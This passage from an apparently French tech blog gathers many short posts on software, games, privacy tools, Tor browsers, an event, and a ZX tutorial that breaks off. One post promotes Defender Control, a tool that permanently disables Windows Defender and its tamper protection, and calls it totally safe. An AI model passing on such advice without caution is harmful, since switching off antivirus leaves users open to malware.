Savez-vous avec qui vous interagissez le plus sur Twitter ?

Pas vraiment. Et pourtant c’est facile de le déterminer grâce aux données publiques de Twitter grâce à cet outil Orbit. Vous entrez simplement votre pseudo Twitter ou celui de la personne qui vous intéresse et l’outil récupérera vos tweets et likes les plus récents ainsi que les interactions que vous avez eu avec les autres, pour produire un score d’interaction.

Et c’est ce score qui permettra de classer les gens par cercle. Ensuite la mise en forme, le nombre de cercles et les couleurs sont modifiables si vous le souhaitez et vous pouvez également télécharger l’image générée.

Je vous laisse donc découvrir les comptes Twitter de mon premier cercle d’interaction. Que des gens cools et sympas. The crème of the crème comme on dit en Normandie.

• @lorenp4
• @GautryNicolas
• @Makiofoigra
• @TheNerd0logist
• @jcfrog
• @l_avrot
• @farton92
• @J0j0b4rj0
• @jmdelauwereyns
• @teamaaz

A tester ici pour ceux qui veulent.

Je vous en ai parlé rapidement dans mon dernier édito et ce matin en sirotant mon café, je me suis dit que ça méritait quand même un article plus détaillé.

Les Geek Faëries est un festival qui célèbre la culture geek au sens large. C’est un moment de partage unique où chacun peut venir avec ses passions, les faire découvrir, rencontrer d’autres passionnés et surtout apprendre et vivre de nouvelles choses. Ça n’a rien à voir avec les conventions geeks que vous pouvez connaître. C’est vraiment beaucoup plus large et beaucoup moins commercial. On est vraiment sur de la passion et de l’échange.

Aller aux Geek Faëries, ça permet vraiment de se ressourcer. De faire une pause de « monde réel » pour kiffer sa passion et celles des autres en toute bienveillance, dans un environnement détendu et ouvert.

Le lieu est magique, les gens sont extra et les activités variées : conférences, cosplay, retrogaming, jeux de rôle, jeux de société, hacking, logiciel libre, arène de combat médiéval, ainsi que des concerts et des moments de rencontre avec les invités. Il y aura même Mozilla, Framasoft et Ratzillas !

Vous pourrez même devenir un livre vivant.

L’événement, auquel je participerai ainsi que Remouk mon acolyte de Webosaure (et son groupe Kickban) aura lieu du 3 au 5 juin prochain. Nous aurons donc le plaisir de vous rencontrer là bas, d’échanger, et de passer un bon moment.

Et je suis certain qu’il fera beau et qu’aucune pandémie ne viendra gâcher la fête 🙂

En 2017, j’avais même réalisé une vidéo portrait de geek que je vous remets ici même si ça date 🙂

Infos pratiques

Maintenant les infos pratiques :

• Date : du 3 au 5 juin 2022
• Lieu : Château de Selles-Sur-Cher (code postal 41130)
• Horaires, tarifs et billeterie
• Comment venir ? (en train, en voiture, en fusée)
• Où se loger ?
• Le règlement à lire absolument
• Et quelques infos pratiques pour survivre sur place

Voilà, pour le résumé. J’espère vraiment vous voir là bas. C’est un peu ma sortie de l’année donc j’espère vraiment qu’on ne se ratera pas sur place.

À très vite !

Avez-vous déjà essayé de copier du texte d’une fenêtre de dialogue d’une app Windows ? Ce n’est pas possible la plupart du temps.

Pour contourner ce problème, un développeur a mis au point Textify, un outil libre qui utilise l’API d’accessibilité de Windows pour pouvoir lire du texte normalement inaccessible à votre clic droit > copier.

Voici une démo de ce que ça donne :

Textify utilise un raccourci que vous pouvez paramétrer pour activer la détection du texte afin de vous permettre de le copier. J’imagine que le besoin n’est pas fréquent mais c’est le genre de petite application vraiment pratique.

Vous pouvez télécharger Textify ici.

Si vous êtes dans l’enseignement ou que ce que voient vos enfants sur Internet vous importe, vous avez sûrement conscience que YouTube peut parfois proposer des vignettes choquantes ou des vidéos qui vont distraire l’élève.

Heureusement, il existe un outil nommé VideoLink destiné aux enseignants outils qui va vous permet de regarder et de partager des vidéos YouTube de manière sûre et conviviale sans aucune distraction ou contenu offensant, que ce soit une image, un lien, un commentaire.

Il vous suffit de coller un lien Youtube sur le site Video.link pour pouvoir la lire dans un environement safe et partager le lien en toute sécurité avec votre classe ou votre famille.

Video.link permet de virer les pubs, de mettre les sous titres, d’avoir un compteur de vues, de modifier le titre de la vidéo, d’activer la lecture automatique et même de ne garder qu’un extrait de la vidéo.

Pratique !

Yo !

C’est la canicool ! J’espère que vous ne suez pas trop du slip devant votre ordinateur qui chauffe encore plus qu’un ASIC ! Je me permets de changer cet édito (j’aimais beaucoup l’ancien, dommage ^^) pour vous indiquer diverses informations importantes surtout lorsqu’on les mets en perspective avec l’actualité internationale :

• Je serais aux Geek Faeries du 3 au 5 juin prochain (c’est ça l’info importante)
• Je suis sur TikTok et c’est le feu
• Je ne pourrais pas streamer lundi et mardi prochain mais je serais là jeudi aux horaires habituels
• Et Jow m’a filé un code promo qui fait -20€ sur vos prochaines courses. Je sais que vous êtes nombreux à l’utiliser alors c’est cadeau: MNJOW20

Sinon, la vie est belle. Mes tomates ont un peu chaud, mais le boulot avance bien (blog, Patreon, Youtube…etc).

Je suis quand même super content de retourner aux Geek Faeries parce que ça m’a vraiment manqué. Y’aura même Remouk et son groupe Kickban pour ceux qui suivent Webosaures.

N’oubliez pas la crème solaire et hâte de vous voir tous là bas !

K.

Si vous voulez vous monter un petit serveur VPN à base de Wireguard et tout gérer au travers d’une jolie interface web, allez jeter un oeil à Drago !

Drago est un gestionnaire de configuration pour WireGuard conçu afin de faciliter la configuration de couches réseau sécurisées réparties sur des noeuds hétérogènes. Noeuds qui sont distribués au travers de différentes machines ou réseaux cloud.

Avec Drago, il est possible, par exemple, de connecter des appareils IoT de manière sécurisée ou de monter un cloud personnel avec plusieurs Raspberry Pi.

Drago fonctionne suivant un principe de client-serveur où le serveur centralisé fait office de passerelle fournissant à de multiples clients Wireguard l’état souhaité par l’utilisateur.

De leurs côtés, les clients Drago, tournent sur chaque nœud du réseau et communiquent entre eux de manière chiffrée. Ils peuvent supporter plusieurs configs Wireguard et sont chargés de récupérer les configurations les plus récentes du serveur par le biais de l’API. Chaque client s’assure que la config récupérée est bien celle stockée dans la base de données de Drago. Tout ce qui est génération de paires de clés est également automatisé et les noeuds se partagent automatiquement les clés publiques.

Si vous utilisez Whatsapp et que vous êtes sous Linux, je vous présente ZapZap.

Il s’agit d’un client Whatsapp desktop non officiel qui intègre la version web de Whatsapp. ZapZap peut tourner en tâche de fond, et affichera l’arrivée de nouveaux messages avec une icone différente sans la barre des tâches.

Bref, très pratique pour ne plus avoir le nez pendu sur le smartphone.

A télécharger ici

Si vous voulez utiliser une autre manette / contrôleur avec votre Nintendo Switch, sachez qu’il existe un projet baptisé Mission Control qui permet cela sans avoir besoin de matériel supplémentaire ou d’adaptateur.

Il vous faudra évidemment une console rootée avec Atmosphere en place pour en profiter, mais une fois placé à la racine de la carte SD de votre console, vous pourrez lier des contrôleurs Wii, des DualShock de Sony, des manettes XBox, Steelseries, Razer et j’en passe.

La connexion se fera en Bluetooth (non LE) et vous pouvez connecter jusqu’à 8 manettes non-Switch simultanément.

Vraiment cool n’est-ce pas ?

Redact est une application disponible sous macOS, Windows et Linux qui va vous permettre de faire un bon ménage dans les services en ligne que vous utilisez. En effet, cet outil vous permet de supprimer toutes les vieilles données de vos services préférés : Discord, Reddit, Twitter, Facebook, Instagram…etc.

Vous pouvez vous demander pourquoi faire ça ? Et bien à titre personnel, je pratique l’auto-nettoyage de mon compte Twitter parce que je vois ça comme une plateforme de l’éphémère et de l’instantanéité. Je recommande à tous de le faire car cette plateforme est remplie de débiles aimant sortir du contexte des messages datés +10 ans pour créer des polémiques.

Par contre, je ne nettoie pas mon Instagram car j’aime m’y replonger de temps en temps.

Il y a plus de 40 services supportés et pour chacun d’entre eux, vous pouvez paramétrer tout ce que vous voulez faire disparaître, en fonction de certaines dates, de certains mots-clés ou de certains types de contenus (likes, commentaires, photos, messages privés…etc.)

L’ensemble de vos choix est également programmable pour qu’une suppression soit déclenchée par Redact tous les 3 mois, tous les 6 mois, tous les ans…et ainsi de suite.

Là où l’outil est super bien pensé, c’est qu’il propose un mode « preview » qui vous permettra de voir quel est le contenu qui sera supprimé. Cela vous assure d’avoir fait les bons choix lors du paramétrage initial.

Pour une utilisation personnelle, Redact est gratuit. Par contre dans un cadre pro, il faudra passer en payant.

L’outil est disponible sous macOS, Windows, Linux et Android sur ce site.

Si vous connaissez le concept de gestionnaire de mots de passe, vous savez qu’un mot de passe maître à retenir permet ainsi de verrouiller l’ensemble de vos mots de passe.

Mais dans certains cas précis, vous n’avez peut-être pas envie de « stocker » un mot de passe. Et hors de question de le retenir. Heureusement il existe des solutions comme Spectre.

Semblable sur son fonctionnement à Lesspass, Spectre est un algorithme qui à partir d’un nom et d’un secret (phrase de passe…etc.) et le nom d’un site, de générer un mot de passe.

Ensuite, pour retrouver ce mot de passe, il faudra entrer à l’identique les données (nom, secret, site). L’outil ne conserve rien, ne demande aucune donnée personnelle, n’envoie rien sur Internet, ne nécessite pas de backup et est totalement open source / libre. Ainsi, pas de leak possible de vos mots de passe, et pas de risque que le service « gestionnaire de mdp » tombe comme ça pourrait être le cas avec un Lastpass ou autre.

Voici comment ça fonctionne :

Vous pouvez l’utiliser pour tester en passant par le site Spectre, mais si vous voulez vraiment l’utiliser pour de vrai, je vous recommande les clients disponibles pour macOS, Windows, Linux, Android et iOS.

Si votre activité professionnelle est au point mort, peut-être occupez-vous tout votre temps à créer des GIFs animés pour briller sur Twitter ?

Si oui, j’ai un super outil pour vous. Il s’agit de Gifcurry, un éditeur vidéo libre qui permet de charger une vidéo, d’en sortir un extrait, de le modifier pour ensuite l’enregistrer au format Gif ou vidéo.

Fonctionnant sous Linux, macOS et sous Windows (si vous gérez la ligne de commande), GifCurry vous permet de recadrer, couper, ajouter du texte, modifier la durée, changer la taille, régler le nombre d’images par seconde, modifier le nombre de couleurs, activer le tramage, importer des sous-titres et bien sûr enregistrer votre création sous forme de GIF ou de vidéo.

Pour l’installer sous Linux, vous devrez avoir GTK+, GStreamer, FFmpeg, et ImageMagick.

Vous devrez également télécharger l’AppImage ou les binaires. Ou si vous utilisez Snap, vous pouvez aussi entrer les commandes suivantes dans votre terminal :

snap install gifcurry
sudo snap connect gifcurry:removable-media
gifcurry

Pour macOS, il faudra télécharger ce script et le lancer comme ceci :

chmod +x gifcurry-mac-install-script.command
./gifcurry-mac-install-script.command

Je vous ai déjà parlé de nombreuses fois de Tor, ce réseau chiffré qui permet de surfer sur Internet en contournant les blocages, la censure et dans une certaine mesure de protéger votre identité. Je dis bien « dans une certaine mesure » car en fonction de ce que vous faites et de votre configuration, il est encore possible de déterminer votre identité.

Les gens pensent souvent à tort qu’utiliser Tor est complexe et demande beaucoup de configuration. Mais c’est faux car il existe des navigateurs accessibles à tous qui à la fois vous permettent de passer par le réseau Tor mais également de protéger votre identité (en intégrant par exemple un bloqueur de tracker).

Tor est utilisé par des tas de gens à travers le monde. Il y a bien sûr des dissidents politiques, des personnes souhaitant communiquer avec leur famille à l’extérieur de leur pays, des gens qui font du business et qui n’ont pas envie de se faire espionner, ou encore des gens soucieux des traces qu’ils laissent en ligne.

L’objectif de cet article est donc de vous présenter les principaux « Navigateurs Tor » user-friendly pour que vous puissiez surfer facilement sur le web normal et le dark web en protégeant au mieux votre identité.

Tor sur un ordinateur (PC ou Mac)

Ici, pas de blabla, la référence c’est le navigateur officiel proposé par Tor : Le Tor Browser. Disponible sous Windows, macOS et Linux, ce Firefox a été configuré et patché pour passer au travers du réseau Tor et cela même si vous êtes dans un pays qui bloque Tor. Cela est rendu possible grâce au mode bridge proposé lors du lancement initial. Il intègre également des extensions protégeant la vie privée comme HTTS Everywhere ou encore NoScript.

Attention toutefois à ne pas ajouter de plug-ins ou d’extensions à votre Tor Browser car ces derniers pourraient compromettre votre identité. Le téléchargement en p2p type Bitorrent est également déconseillé car cela peut mener à la découverte de votre adresse IP et cela alourdit également le réseau.

Tor Browser est téléchargeable ici

Tor sur votre smartphone Android

On peut également surfer via Tor sur un smartphone Android. Toute d’abord avec un portage officiel de Tor Browser que vous pouvez télécharger ici au format APK ou directement sur le Google Play Store.

Tor sur votre iPhone / iPad

Et si vous êtes dans l’écosystème Apple, le navigateur de référence s’appelle Onion Browser. Il est open source, passe par le réseau Tor (connexions chiffrées) et protège à la fois votre vie privée et l’historique de ce que vous faires en ligne. Il y a également de nombreux paramètres que vous pouvez régler.

Comment tester si ça fonctionne ?

Pour tester l’efficacité de votre installation Tor ou de votre navigateur, il existe de nombreux sites qui vérifient toutes les fuites de données que vous pourriez rencontrer, de l’empreinte de votre navigateur en passant par votre IP ou votre géolocalisation.

• Browser Leaks
• LocateJS
• IPLeak
• Cover Your Tracks de l’EFF

Evidemment, ce que je vous ai présenté ici n’est que la partie émergée de l’iceberg. Il y a de nombreuses façons d’implémenter Tor, par exemple via une passerelle Raspberry Pi…etc. Si ça vous intéresse, dites-le-moi et je vous ferai un tuto.

Amusez-vous bien et surfez couverts !

Le saviez-vous ? Tous les jeudis à partir de 12h30, on se retrouve (Korben et Remouk) sur Twitch pour enregistrer un podcast en direct : les Webosaures ! Ça parle de web, de tech, d’informatique, mais vu par les vieux dinosaures grabataires que nous sommes.

L’émission de la semaine dernière était un peu spéciale car nous sommes revenus sur les consoles de jeux vidéo que l’Histoire aura qualifié de GROS FAIL. De bons et de mauvais souvenirs en perspective. 😀 Il est possible de l’écouter sur votre appli de podcast préférées, ou alors de voir le replay vidéo sur Youtube !

Pour rappel, ça se déroule en live sur notre chaîne Twitch (@webosaures), chaque jeudi à partir de 12h30. 🤓

Les lecteurs de disquettes ont quasiment disparu depuis des années. Pourtant il y a encore énormément de machines qui en ont besoin. Consoles rétro, vieux ordinateurs, machines industrielles, instruments de musique…etc. fonctionnent avec des lecteurs de disquette et ont encore besoin de pièce de remplacement.

Mais elles sont difficiles voire impossibles à trouver.

L’autre problème avec les lecteurs de disquettes, c’est le support « disquette » en lui-même. Il est de moins en moins fiable et se dégrade avec les années.

Heureusement, Jean-François Del Nero a imaginé un émulateur de lecteur de disquette qui utilise une carte SD à la place de la disquette. Ce projet a débuté en 2006 avec pour simple objectif de faire revivre des machines Atari ST et Amiga et a aujourd’hui bien évolué avec le support de nombreux appareils.

Le HxC Floppy émule le comportement et les fonctionnalités d’un grand nombre de lecteurs de disquettes existants ou ayant existé et supporte tous les formats de disquettes. Le projet est open source ce qui vous permettra de construire votre propre émulateur si vous faites un peu d’électronique.

Voici ce que ça donne une fois intégré sur un vieux Japax JAPT 4G.

Mais rassurez-vous, il existe également des revendeurs capables de vous fournir ces émulateurs avec le bon connecteur.

Bref, un super projet qui a sauvé beaucoup de machines, y compris dans des usines.

Sur tous les navigateurs récents, il y a maintenant une fonctionnalité de synchronisation qui permet une fois connecté de récupérer selon les services ses bookmarks, son historique, ainsi que la liste des plugins.

Firefox Sync est le plus connu de ces services mais Google Sync ou Opera Sync permettent de faire la même chose. Seulement voilà, ce n’est pas très esprit vie privée et logiciel libre tout ça.

C’est pourquoi des développeurs libristes ont mis au point l’extension gratuite xBrowserSync pensée pour synchroniser vos bookmarks entre tous vos navigateurs tout en respectant votre vie privée et votre anonymat. Pas besoin de vous inscrire, il suffit de télécharger l’extension, de saisir un mot de passe pour chiffrer les données que vous allez lui envoyer et hop de synchroniser tout ça. En échange, vous obtiendrez un ID unique que vous devrez renseigner dans tous vos autres navigateurs / appareils pour que ces derniers récupèrent ce qui a été synchronisé.

Au-delà des simples bookmarks, xBrowserSync permet également de classer et enrichir ces derniers avec des descriptions et des tags si cela vous fait envie. Et une interface permet de faire des recherches parmi ces derniers.

Pour fonctionner, xBrowserSync repose sur des serveurs de synchronisation publics maintenus par la communauté dont la liste se trouve ici. Vous pourrez même monter votre propre serveur.

xBrowserSync est disponible pour Firefox, Chrome et ses dérivés. Et une application Android est également disponible sur F-Droid, le Play Store ou en APK. Vous trouverez tous les liens de téléchargement ici.

Si vous utilisez Linux, vous connaissez forcément Wine. Ce logiciel permet de faire tourner des applications et des jeux Windows sous Linux. C’est un logiciel qui n’est pas simple à configurer pour un débutant et qui ne fonctionne pas à tous les coups selon les paramètres que vous lui donnez ou le programme que vous tentez de lancer.

Heureusement, il existe un projet libre vraiment cool qui s’appelle « Bottles » (Traduit par Bouteilles) qui vous permet très facilement de créer et gérer différents environnements pour faire tourner toutes vos applications et vos jeux Windows.

Pour ce faire, vous avez également accès à des dépendances que vous pouvez rajouter ainsi que différents installeurs comme Gog, Battle.net, EA Launcher, Origin…etc.

Bottles est dispo en flatpak, AUR ou dans tout un tas de paquets créés par la communauté.

La documentation est également dispo ici.

Remnants of the Precursors de Ray Fowler est une adaptation moderne d’un jeu de stratégie sorti en 1993 et nommé « Master of Orion ». Dans ce jeu de conquête spatiale, vous débutiez avec un vaisseau de colons et deux vaisseaux d’exploration en orbite autour de votre planète. Vous partiez alors à la découverte de nouveaux mondes, pour les coloniser et éventuellement mener la guerre à de nouvelles races extraterrestres, avec en toile de fond des tas de légendes sur les Orions, une race maîtresse qui contrôlait la galaxie.

Remnants of the Precursors est donc un jeu indépendant qui reprend le gameplay et l’univers de Master of Orion. Vous pourrez y incarner l’une des 10 races aliens pour la mener à la victoire afin de dominer la galaxie.

Évidemment, l’interface a été repensée pour que ce soit plus simple, l’AI du jeu est beaucoup plus compétitive et vous pouvez choisir son niveau. Le système diplomatique a également été revu pour autoriser plus d’interactivité qu’à l’époque et les cartes sont beaucoup plus grandes pour accueillir encore plus de vaisseaux afin que les combats spatiaux soient encore plus épiques.

Bref plein de trucs cools qui vous plairont sans toutefois dénaturer l’esprit d’origine de Master of Orion. Remnants of the Precursors c’est comme un bon vieux jeu rétro sorti récemment :-).

Il est dispo sous Linux, Windows et macOS et est totalement gratuit (mais vous pouvez faire un petit don). Et si au premier abord le jeu vous semble complexe, rassurez-vous, il y a un mode d’emploi disponible ici.

À télécharger ici

Vous connaissez F-Droid ?

Mais si, cette application pour Android qui permet de se passer du Google Play Store pour installer de nombreuses applications FOSS (logiciels libres et open source). Si vous ne l’avez pas encore, scannez ce QR Code pour l’installer.

Un des avantages de F-Droid, c’est qu’il permet d’y ajouter des dépôts. Et parmi ces dépôts, il y a celui de Second Wind.

Second Wind est simplement un dépôt qui regroupe une collection d’applications libres capables de fonctionner sans réseau. On y trouve entre autres des logiciels de cartographie ou de guidage comme OsmAnd~, une boussole Trail Sense, mais également Umbrella, un guide de survie / de premier secours et bien sûr Briar, une messagerie fonctionnant grâce au Bluetooth et au Wifi.

Second Wind est une bonne idée puisqu’il permet rapidement de faire le plein sur son smartphone de nombreuses applications (dont des jeux) dont on est sûr qu’elles continueront à fonctionner même si on est déconnecté des réseaux. Il y a même une app baptisée ProofMode pour prendre, signer et horodater des photos qui seront utilisables comme preuves.

Pour ajouter le dépôt, vous pouvez suivre ce tuto et ajouter le QR code qui suit :

Bonne découverte à tous !

Lorsqu’on crée un site web ou une application mobile, il nous faut de la donnée… Et oui, il faut pouvoir collecter un peu de données pour comprendre comment nos clients et nos utilisateurs se comportent dessus.

Seulement, voilà, ce n’est pas simple à faire soi-même alors la plupart des développeurs se tournent vers des solutions commerciales qui exploitent allégrement les données personnelles des utilisateurs.

Toutefois, si vous êtes un dev avec un peu d’éthique, il est possible d’implémenter Clean Insights qui offre des SDK et des outils basés sur Matomo pour avoir de la donnée anonymisée et sécurisée.

Cela vous permettra de mesurer et de connaître les habitudes d’utilisation de votre service ou application sans toutefois mettre en place une surveillance invasive de vos users. Clean Insights collecte le minimum d’informations, avec une fréquence la plus réduite possible et en la diluant un maximum. Cela signifie que plutôt que de collecter la ville de l’utilisateur, on va simplement collecter sa région.

Le lien entre les données et l’individu est également rompu dès la collecter en y ajoutant du bruit. Ainsi, les individus ne peuvent être reliés aux informations collectées après coup.

Évidemment, tout est transparent dans leur initiative et le projet est sérieusement soutenu par The Guardian Project. C’est d’ailleurs le système d’analyse utilisé par F-Droid et Mailvelope.

Si vous faites des scripts en Python, mais que vous n’avez toujours pas franchi le pas des interfaces utilisateurs, voici un moyen simple de le faire.

Basée sur la célèbre lib Tkinter qui permet de faire des GUI, la lib Guizero permet aux débutants de concevoir facilement leurs interfaces graphiques en Python.

Une fois installé à l’aide de :

pip3 install guizero

Il est ensuite assez simple de dessiner vos interfaces graphiques en y intégrant tous les widgets nécessaires. Cela va du bouton à cocher à la liste en passant par l’import d’image ou le champ de saisie.

Du classique, mais du facile à implémenter. Par exemple, un petit Hello World ressemblerait à ça :

Allez jeter un oeil à la doc. Vous verrez que c’est super easy et ça vous permettra à vos utilisateurs d’avoir des interactions plus simples avec vos outils en ligne de commande, sans pour autant y passer trop de temps.

À découvrir ici.

Si vous ne savez pas vraiment coder, faire des boules « until » ou ce genre de choses, voici une application qui vous permettra de contourner le problème si vous faites un peu de systèmes.

Cette application, c’est « Retry » qui une fois installé sous Linux pour permettra de repasser une commande jusqu’à ce que celle-ci passe avec succès.

Pour fonctionner, Retry capture le stdin en mémoire au fur et à mesure que les données sont transmises à la commande, et ce stdin capturé est ensuite rejoué si la commande est répétée. Cela permet d’intégrer de la répétition dans des pipelines shell. Retry capture également le stdout en mémoire, et si la commande a réussi, le stdout est marqué comme normal. Au contraire, si la commande a été répétée, le stdout est changé en stderr.

Cela garantit que la sortie est bien passée à stdout une seule et unique fois.

Pour installer Retry sous Ubuntu / Debian :

sudo add-apt-repository ppa:minfrin/retry
sudo apt-get update
sudo apt-get install retry

Ainsi, Retry permet dans vos scripts ou appels CRON de jouer la répétition jusqu’à ce qu’un résultat soit différent (succès ou erreur).

Bref, ça peut servir dans certains cas.

Si vous disposez de plusieurs caméras et que vous voulez les configurer pour surveiller votre domicile, observer les oiseaux, regarder votre animal domestique se lécher la pastille pendant votre absence ou encore faire du livestreaming, Motion peut vous aider.

Cet outil en ligne de commande pour Linux permet créer des vidéos ou de capturer des photos à partir de vos caméras dès qu’un mouvement est détecté. Motion autorise également l’enregistrement en continu, la visualisation en live de vos flux vidéos ou encore le lancement de scripts spécifiques lorsqu’une activité est détectée.

Chaque événement détecté par vos caméras peut ensuite être consigné dans une base de données et si vos caméras filment une partie du voisinage ou la rue (ce qui est interdit), vous pouvez mettre en place des masques personnalisables pour garantir l’anonymat et le respect de la loi.

Motion supporte un grand nombre de caméras, aussi bien caméras IP (RTSP, RTMP, HTTP), webcams V4L2, caméras de Rpi ou encore tout ce qui est carte d’acquisition vidéo.

Chaque flux vidéo est accessible en HTTPS et est sécurisé par une authentification pour pouvoir le regarder ou le piloter.

Motion est à découvrir ici. Et sa documentation est là.

Et si je vous disais qu’on peut faire un serveur web sur à peu près n’importe quelle machine ?

La preuve avec Terrence Vergauwen qui a utilisé un ordinateur de poche HP 200 LX (PalmTop PC) sorti en 1994, équipé d’un système MS-DOS, d’un CPU 16 bits 80186, de 1 MB de RAM, d’une carte CompactFlash de 2Go de stockage et d’un emplacement PCMCIA pour le modem, afin de délivrer les pages de son site PalmtopTube.com.

L’ordinateur baptisé Félix a quand même subi un petit upgrade qui lui a permis de passer de 8 MHz à 16 MHz au niveau du CPU, et il lui a rajouté également une extension de RAM de 2 MB supplémentaire.

Concernant les fichiers, le HP 200 LX utilise un stockage accessible via le réseau Ethernet, et pour la connexion SSL, il utilise également un reverse proxy installé sur un Raspberry Pi.

Voici l’architecture détaillée du projet :

Ainsi, en HTTPS, l’ordinateur de poche peut absorber 377 000 accès par jour. Avec une connexion directe en HTTP, le rendement pourrait même atteindre 1 demi-million d’accès par jour.

source

Comme hier, on reste dans l’esprit Windows. Et aujourd’hui, on va apprendre à modifier le BSOD de votre OS préféré, à savoir Windows 10.

Le BSOD ou Blue Screen Of Death c’est ça :

Alors à quoi ça sert de le modifier ?

Et bien à rien. Juste pour le fun, le plaisir ou pour vous la raconter devant vos potes. L’intérêt que j’y vois, en ce qui me concerne, c’est que cela permet de comprendre comment fonctionnent les appels système de Windows et comment il est possible de les détourner.

2: kd> ? nt!HalpPCIConfigReadHandlers+0x18 
Evaluate expression: -8769656301296 = fffff806`27c05910
2: kd> dt nt!_UNICODE_STRING fffff806`27c05910
 ":("
   +0x000 Length           : 4
   +0x002 MaximumLength    : 6
   +0x008 Buffer           : 0xfffff806`27c1faf4  ":(

AndryWindows est un driver développé par le codeur ch3rn0byl qui modifie l’émoticon, la couleur et le message inscrit sur le BSOD.

Par défaut, voici par quoi il sera remplacé :

Mais en grattant un peu dans les sources, vous pourrez tout personnaliser.

Les sources sont disponibles ici.

Attention, désactiver Windows Defender n’est pas une opération sans risque. Cet outil de Microsoft protège vraiment votre ordinateur et forcer sa désactivation peut vous exposer à des risques de sécurité.

Maintenant que vous êtes au courant, sachez qu’il est difficile de désactiver Windows Defender car Microsoft fait régulièrement des mises à jour et s’arrange toujours pour que celui-ci se réactive sur votre Windows 10 ou 11.

Le seul cas de figure où Windows Defender accepte de se désactiver, c’est dans les cas où vous installer un antivirus. Mais si vous n’avez pas d’antivirus et quand même une grosse envie de le désactiver malgré les risques, voici un outil open source qui fait des miracles.

Cet outil c’est Defender Control qui permet de désactiver de manière permanente. Pour cela, l’outil récupère les bonnes permissions qui lui permettent de désactiver tous les services liés à Windefender. Il désactivera également la protection « anti sabotage » de Windows ainsi que toutes les clés et autres paramètres liés à Windefender.

En installant Defender Control, votre antivirus risque également de crier, mais pas de panique, l’outil est totalement safe. Évidemment, le mieux c’est de ne pas me croire et d’aller regarder vous-même les sources qui se trouvent ici et de compiler vous-même l’outil.

— Article rédigé par l’ami Remouk (DansTonChat) – Merci à lui —

Plus de 25 ans après Mario dans Super Mario 64, c’est enfin au tour de Kirby d’avoir son propre jeu de plateforme en 3D ! C’est fou quand on y pense. 🤯 Bien sûr la petite boule rose est déjà sortie de son carcan en deux dimensions, mais jamais pour son aventure principale et avec de véritables déplacements dans toutes les directions. Est-ce que cette transformation est réussie ? Nous allons voir ça en détail.

Oui.
…
Bon OK je détaille un peu plus ! 😀 Tout d’abord, il faut reconnaître que le charme de Kirby, dans son univers ultra mignon, opère immédiatement. Soyons clairs, on est loin d’un Elden Ring car ici tout est bucolique, apaisant, enchanteur.

Grâce à un aspect technique extrêmement soigné, l’expérience est satisfaisante à chaque instant. Chaque personnage est joli, les animations parfaites, les bruitages, les musiques, je me sens un peu idiot à lister tout ça, mais vraiment, on sent l’amour du travail bien fait et on est toujours surpris par de petits détails.

Manette en main, pareil, c’est un bonheur. Tous les mouvements sont fluides, la caméra est toujours parfaitement placée… Certains pouvoirs demanderont plusieurs essais avant d’être maîtrisés, mais il s’agit surtout de bien comprendre leur fonctionnement.

Et oui, j’ai parlé de pouvoirs ! Si vous ne le saviez pas, Kirby peut (quasiment) tout avaler, même les ennemis, et ainsi copier leurs capacités spéciales : épée, feu, foreuse, bombe… Non seulement il y a beaucoup de possibilités, mais en plus on peut les améliorer en retournant dans le village Waddle Dee qui nous sert de base.

D’ailleurs, d’autres activités y seront débloquées au fur et à mesure de votre progression. En plus de l’aventure principale, il y a plein de petites choses à faire ! Tout comme dans chaque niveau, il y a plein de petits secrets à découvrir… Sans parler des épreuves bonus, ou encore du transmorphisme, qui permet d’utiliser certains objets d’une manière… Heu… Très originale !

Vous l’avez compris, c’est un jeu généreux. On peut même jouer à deux, en coopération ! Comme tout jeu Kirby, c’est parfaitement adapté aux enfants, mais on peut y trouver son compte à tout âge : si finir tous les niveaux est à la portée des moins habiles, libérer tous les Waddle Dee et dénicher tous les secrets demandera un peu plus de réflexion et de dextérité. 🙂 Une chose est sûre : l’aventure n’est jamais frustrante.

Acheter Kirby et le monde oublié sur Nintendo Switch

Si vous ne me croyez pas, il vous suffit de tester par vous-même : une démo est disponible sur l’eShop de Nintendo !

VGC Software a mis au point une technologie permettant de faciliter la création d’illustrations et d’animations indépendamment de la résolution. Vous le savez, en animation, pour que ça rende bien, l’oeil humain a besoin de percevoir un minimum de 24 images par seconde. En dessinant à la main, cela signifie qu’il faut produire 24 dessins pour une seconde de film.

Avec son logiciel VPaint, encore en beta, il est possible gratuitement de dessiner à la main et ensuite définir la largeur des traits, leur courbure, leur lissage en vectoriel, et mettre ensuite tout ça en couleur.

Mais le plus beau là-dedans, c’est qu’il devient possible ensuite de créer une animation en dessinant chaque image ou en générant automatiquement les images de transition. L’outil intègre également un système de calques, ce qui permet de superposer plusieurs vues.

Même si je me doute que les professionnels de l’animation utilisent des outils beaucoup plus complexes et onéreux, VPaint permet à tous de créer par exemple un petit dessin animé, une animation pour un site web voire un logo à main levée qui sera ensuite « corrigeable » facilement.

VPaint est téléchargeable ici pour Linux, Windows et macOS.

Les sources sont disponibles ici

Si vous n’avez pas d’ami, pas de famille, pas de travail et peu d’interactions sociales, il est temps de vous sortir les doigts de la combinaison spatiale pour vous rendre sur la Station Spatiale 14 !

Grâce à ce RPG libre et open source, vous allez pouvoir rejoindre une mission spatiale dans laquelle vous incarnerez un astronaute qui devra joué son rôle à la perfection. L’idée de jeu, c’est vraiment de faire du roleplay (jeu de rôle), c’est-à-dire de jouer à fond son personnage comme si c’était la vraie vie.

Il pleins de serveurs disponibles donc à vous de choisir la communauté qui vous plaira le plus, et vous pourrez embrasser une carrière d’astrobiologiste ou de clown de l’espace. Bref, devenir presque comme Thomas (Pesquet).

Comme c’est un logiciel libre, il n’est pas simple à prendre en main, donc il faudra vous accrocher. N’oubliez pas que pour vous déplacer, ce sera les touches WASQD à l’ancienne.

Si vous faites des scripts en bash, déjà ça veut dire que vous êtes une belle personne. Mais ça veut également dire que Google pense à vous.

En effet, cette petite entreprise qui un jour sera connue dans le monde entier, j’en suis sûr, a mis en ligne sur son Github un outil qui s’appelle ZX et qui permet d’écrire des scripts beaucoup plus simplement et beaucoup plus rapidement.

Reposant sur NodeJS, ZX ne perdra pas tous ceux qui sont déjà familiers avec JavaScript et Node.js. ZX a la particularité de faciliter la création de child_process et la gestion des messages sortants (stdout et stderr).

Prenons un exemple type hello world qui va utiliser la commande « ls » pour lister les fichiers d’un répertoire et récupérer la sortie de cette commande.

On va d’abord créer un répertoire :

mkdir hello
cd hello

Puis on va initialiser un nouveau projet dans le dossier :

npm init --yes

Ensuite, pour installer zx, il faudra passer par npm comme ceci :

npm install --save-dev zx

On va ensuite créer un script avec l’extension .mjs

nano hello.mjs

